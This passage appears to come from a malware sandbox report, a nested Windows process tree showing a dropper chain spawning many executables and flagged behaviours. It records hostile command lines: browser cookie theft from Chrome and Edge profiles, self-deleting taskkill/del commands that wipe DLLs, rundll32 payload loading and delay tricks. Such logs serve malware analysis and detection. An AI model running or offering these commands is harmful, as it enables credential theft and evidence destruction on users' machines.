                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                9⤵
                                                                                                                                  PID:5712
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCE333CA5\karotima_2.exe
                                                                                                                                    karotima_2.exe
                                                                                                                                    10⤵
                                                                                                                                      PID:6036
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCE333CA5\karotima_2.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\7zSCE333CA5\karotima_2.exe" -a
                                                                                                                                        11⤵
                                                                                                                                          PID:5700
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                      9⤵
                                                                                                                                        PID:5704
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCE333CA5\karotima_1.exe
                                                                                                                                          karotima_1.exe
                                                                                                                                          10⤵
                                                                                                                                            PID:6044
                                                                                                                                            • C:\Users\Admin\Documents\hmRsRlSpBXdtWoU5tmnrbDTU.exe
                                                                                                                                              "C:\Users\Admin\Documents\hmRsRlSpBXdtWoU5tmnrbDTU.exe"
                                                                                                                                              11⤵
                                                                                                                                                PID:4168
                                                                                                                                                • C:\Users\Admin\Documents\hmRsRlSpBXdtWoU5tmnrbDTU.exe
                                                                                                                                                  C:\Users\Admin\Documents\hmRsRlSpBXdtWoU5tmnrbDTU.exe
                                                                                                                                                  12⤵
                                                                                                                                                    PID:6456
                                                                                                                                                • C:\Users\Admin\Documents\FJaFxEowprpfsat1g94sIkvV.exe
                                                                                                                                                  "C:\Users\Admin\Documents\FJaFxEowprpfsat1g94sIkvV.exe"
                                                                                                                                                  11⤵
                                                                                                                                                    PID:5440
                                                                                                                                                    • C:\Users\Admin\Documents\FJaFxEowprpfsat1g94sIkvV.exe
                                                                                                                                                      C:\Users\Admin\Documents\FJaFxEowprpfsat1g94sIkvV.exe
                                                                                                                                                      12⤵
                                                                                                                                                        PID:6468
                                                                                                                                                    • C:\Users\Admin\Documents\f5n9iupaPV4j_h0KYE9sCoJK.exe
                                                                                                                                                      "C:\Users\Admin\Documents\f5n9iupaPV4j_h0KYE9sCoJK.exe"
                                                                                                                                                      11⤵
                                                                                                                                                        PID:6128
                                                                                                                                                      • C:\Users\Admin\Documents\ePmgGB7nxrfEST5raS3Fhf4V.exe
                                                                                                                                                        "C:\Users\Admin\Documents\ePmgGB7nxrfEST5raS3Fhf4V.exe"
                                                                                                                                                        11⤵
                                                                                                                                                          PID:764
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                                                                                                            12⤵
                                                                                                                                                              PID:5092
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd
                                                                                                                                                                13⤵
                                                                                                                                                                  PID:5968
                                                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                    findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                                                                                                                    14⤵
                                                                                                                                                                      PID:4168
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                                                                                                                      Acre.exe.com k
                                                                                                                                                                      14⤵
                                                                                                                                                                        PID:7140
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com k
                                                                                                                                                                          15⤵
                                                                                                                                                                            PID:6780
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com k
                                                                                                                                                                              16⤵
                                                                                                                                                                                PID:7008
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com k
                                                                                                                                                                                  17⤵
                                                                                                                                                                                    PID:6384
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com k
                                                                                                                                                                                      18⤵
                                                                                                                                                                                        PID:6580
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com k
                                                                                                                                                                                          19⤵
                                                                                                                                                                                            PID:7092
                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                  ping 127.0.0.1 -n 30
                                                                                                                                                                                  14⤵
                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                  PID:6760
                                                                                                                                                                          • C:\Users\Admin\Documents\Spzf_gCTxWKfhzEm6pQSuTm2.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\Spzf_gCTxWKfhzEm6pQSuTm2.exe"
                                                                                                                                                                            11⤵
                                                                                                                                                                              PID:1424
                                                                                                                                                                              • C:\Users\Admin\Documents\Spzf_gCTxWKfhzEm6pQSuTm2.exe
                                                                                                                                                                                C:\Users\Admin\Documents\Spzf_gCTxWKfhzEm6pQSuTm2.exe
                                                                                                                                                                                12⤵
                                                                                                                                                                                  PID:6564
                                                                                                                                                                                • C:\Users\Admin\Documents\Spzf_gCTxWKfhzEm6pQSuTm2.exe
                                                                                                                                                                                  C:\Users\Admin\Documents\Spzf_gCTxWKfhzEm6pQSuTm2.exe
                                                                                                                                                                                  12⤵
                                                                                                                                                                                    PID:7040
                                                                                                                                                                                • C:\Users\Admin\Documents\ccjvPIuDNqFBWSURk0_3z6BJ.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\ccjvPIuDNqFBWSURk0_3z6BJ.exe"
                                                                                                                                                                                  11⤵
                                                                                                                                                                                    PID:2088
                                                                                                                                                                                    • C:\Users\Admin\Documents\ccjvPIuDNqFBWSURk0_3z6BJ.exe
                                                                                                                                                                                      C:\Users\Admin\Documents\ccjvPIuDNqFBWSURk0_3z6BJ.exe
                                                                                                                                                                                      12⤵
                                                                                                                                                                                        PID:6624
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im ccjvPIuDNqFBWSURk0_3z6BJ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\ccjvPIuDNqFBWSURk0_3z6BJ.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                          13⤵
                                                                                                                                                                                            PID:4372
                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                              taskkill /im ccjvPIuDNqFBWSURk0_3z6BJ.exe /f
                                                                                                                                                                                              14⤵
                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                              PID:6028
                                                                                                                                                                                      • C:\Users\Admin\Documents\G2MBrSfPQgAU57i4xL1owIAO.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\G2MBrSfPQgAU57i4xL1owIAO.exe"
                                                                                                                                                                                        11⤵
                                                                                                                                                                                          PID:6056
                                                                                                                                                                                          • C:\Users\Admin\Documents\G2MBrSfPQgAU57i4xL1owIAO.exe
                                                                                                                                                                                            C:\Users\Admin\Documents\G2MBrSfPQgAU57i4xL1owIAO.exe
                                                                                                                                                                                            12⤵
                                                                                                                                                                                              PID:6632
                                                                                                                                                                                          • C:\Users\Admin\Documents\v6Sy9vZNrzcQOBgbfxbL5U2H.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\v6Sy9vZNrzcQOBgbfxbL5U2H.exe"
                                                                                                                                                                                            11⤵
                                                                                                                                                                                              PID:4540
                                                                                                                                                                                            • C:\Users\Admin\Documents\tTjHqcrG3FhAaHfDlZ1pvZVR.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\tTjHqcrG3FhAaHfDlZ1pvZVR.exe"
                                                                                                                                                                                              11⤵
                                                                                                                                                                                                PID:2348
                                                                                                                                                                                                • C:\Users\Admin\Documents\tTjHqcrG3FhAaHfDlZ1pvZVR.exe
                                                                                                                                                                                                  C:\Users\Admin\Documents\tTjHqcrG3FhAaHfDlZ1pvZVR.exe
                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                    PID:6392
                                                                                                                                                                                                  • C:\Users\Admin\Documents\tTjHqcrG3FhAaHfDlZ1pvZVR.exe
                                                                                                                                                                                                    C:\Users\Admin\Documents\tTjHqcrG3FhAaHfDlZ1pvZVR.exe
                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                      PID:6836
                                                                                                                                                                                                  • C:\Users\Admin\Documents\KzYyLerRQh1nf58Q05sFxR26.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\KzYyLerRQh1nf58Q05sFxR26.exe"
                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                      PID:3980
                                                                                                                                                                                                    • C:\Users\Admin\Documents\vYzGXCXVKBtkAGpOJnLgNpMf.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\vYzGXCXVKBtkAGpOJnLgNpMf.exe"
                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                        PID:4180
                                                                                                                                                                                                      • C:\Users\Admin\Documents\DWKmO8vQMDQMoc6arIt490t3.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\DWKmO8vQMDQMoc6arIt490t3.exe"
                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                          PID:5952
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                              PID:6584
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                PID:5020
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                  PID:1200
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                    PID:6588
                                                                                                                                                                                                                • C:\Users\Admin\Documents\OiLqM5QR3xvU0NARXoD14xyQ.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Documents\OiLqM5QR3xvU0NARXoD14xyQ.exe"
                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                    PID:5768
                                                                                                                                                                                                                  • C:\Users\Admin\Documents\qRXxAaR7FsygGu3wKYSZeuEd.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Documents\qRXxAaR7FsygGu3wKYSZeuEd.exe"
                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                      PID:5288
                                                                                                                                                                                                                      • C:\Users\Admin\Documents\qRXxAaR7FsygGu3wKYSZeuEd.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Documents\qRXxAaR7FsygGu3wKYSZeuEd.exe"
                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                          PID:6524
                                                                                                                                                                                                                      • C:\Users\Admin\Documents\uoODLJdZ696EFVCOtecsM3NZ.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Documents\uoODLJdZ696EFVCOtecsM3NZ.exe"
                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                          PID:4600
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 660
                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                            PID:6712
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 672
                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                            PID:6832
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 676
                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                            PID:7004
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 680
                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                            PID:7128
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 1088
                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                            PID:6920
                                                                                                                                                                                                                        • C:\Users\Admin\Documents\AdnNa9eFT8p6TsI417zUY0iy.exe
                                                                                                                                                                                                                          "C:\Users\Admin\Documents\AdnNa9eFT8p6TsI417zUY0iy.exe"
                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                            PID:4160
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im AdnNa9eFT8p6TsI417zUY0iy.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\AdnNa9eFT8p6TsI417zUY0iy.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                PID:6708
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  taskkill /im AdnNa9eFT8p6TsI417zUY0iy.exe /f
                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                  PID:6232
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                  PID:6404
                                                                                                                                                                                                                            • C:\Users\Admin\Documents\CkoKHm7WF0iXiNJgV_Zrb1IP.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Documents\CkoKHm7WF0iXiNJgV_Zrb1IP.exe"
                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                PID:6032
                                                                                                                                                                                                                                • C:\Users\Admin\Documents\CkoKHm7WF0iXiNJgV_Zrb1IP.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\CkoKHm7WF0iXiNJgV_Zrb1IP.exe" -a
                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                    PID:6300
                                                                                                                                                                                                                                • C:\Users\Admin\Documents\G3_e_o5U5T9dkywJfVPjmr4V.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\G3_e_o5U5T9dkywJfVPjmr4V.exe"
                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                    PID:5224
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                        PID:6388
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS4F8A7AF6\setup_install.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\7zS4F8A7AF6\setup_install.exe"
                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                            PID:6452
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                PID:1360
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS4F8A7AF6\karotima_2.exe
                                                                                                                                                                                                                                                  karotima_2.exe
                                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                                    PID:4892
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4F8A7AF6\karotima_2.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zS4F8A7AF6\karotima_2.exe" -a
                                                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                                                        PID:4612
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                      PID:5488
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4F8A7AF6\karotima_1.exe
                                                                                                                                                                                                                                                        karotima_1.exe
                                                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                                                          PID:7144
                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\BwDhHK50IKG_EbgvOxaaU22D.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\BwDhHK50IKG_EbgvOxaaU22D.exe"
                                                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                                                              PID:6620
                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\YmI7yejOd5pFQG_Ri9R2etFT.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\YmI7yejOd5pFQG_Ri9R2etFT.exe"
                                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                                PID:6012
                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\YsRMwKGDRvWv5kntitheSmLf.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\YsRMwKGDRvWv5kntitheSmLf.exe"
                                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                                  PID:6424
                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\t6pRWon34puO5xSGG5t3wSMX.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\t6pRWon34puO5xSGG5t3wSMX.exe"
                                                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                                                    PID:1152
                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\IAzkx2W9Wu6DRAI_OlSv7oJO.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\IAzkx2W9Wu6DRAI_OlSv7oJO.exe"
                                                                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                                                                      PID:6196
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\XyImkI5bWnfEHDYIF7XsRqqc.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\XyImkI5bWnfEHDYIF7XsRqqc.exe"
                                                                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                                                                        PID:5468
                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\bYslae_WOPX0ydUGIz9I74G5.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\bYslae_WOPX0ydUGIz9I74G5.exe"
                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                          PID:3196
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\Hq9fJVgtOHAEOHQFZ70PSkbW.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\Hq9fJVgtOHAEOHQFZ70PSkbW.exe"
                                                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                                                            PID:4332
                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\f2lHrYE86UvQhmoWn7Ij5Vr_.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\f2lHrYE86UvQhmoWn7Ij5Vr_.exe"
                                                                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                                                                              PID:7256
                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\jRCA2yHxXbgStQruS_TvJcu1.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\jRCA2yHxXbgStQruS_TvJcu1.exe"
                                                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                                                PID:7288
                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\KDWJ44lkjNUmJAX8bZiHMUBM.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\KDWJ44lkjNUmJAX8bZiHMUBM.exe"
                                                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                                                  PID:7308
                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\RYenoQNZeZF_rqa6X0ZN4b_X.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\RYenoQNZeZF_rqa6X0ZN4b_X.exe"
                                                                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                                                                    PID:7452
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\AoMPLiWncWBp5R4wgTb70mX2.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\AoMPLiWncWBp5R4wgTb70mX2.exe"
                                                                                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                                                                                      PID:7480
                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\ZhM78bD5uli0eJZ32d7vfi57.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\ZhM78bD5uli0eJZ32d7vfi57.exe"
                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                              PID:5816
                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\VyB8GFV_q4UxQOF_uW6J52ol.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\VyB8GFV_q4UxQOF_uW6J52ol.exe"
                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                PID:6232
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\5383716.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\5383716.exe"
                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                    PID:5220
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\4302106.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\4302106.exe"
                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                      PID:5036
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\dyOWfE3lbayHhEO71MzAVxIG.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\dyOWfE3lbayHhEO71MzAVxIG.exe"
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                          PID:1960
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\jB3gODsqRz8Af61DIecH9FSi.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\jB3gODsqRz8Af61DIecH9FSi.exe"
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          PID:4996
                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\jB3gODsqRz8Af61DIecH9FSi.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\jB3gODsqRz8Af61DIecH9FSi.exe" -a
                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                              PID:4616
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                        PID:2240
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCAEE72F4\sonia_6.exe
                                                                                                                                                                                                                                                                          sonia_6.exe
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                          PID:3848
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:1020
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:4612
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:2184
                                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                    PID:1148
                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                      PID:2276
                                                                                                                                                                                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                    PID:664
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                      PID:3108
                                                                                                                                                                                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                    PID:5424
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:5460
                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:5656
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\17E9.exe
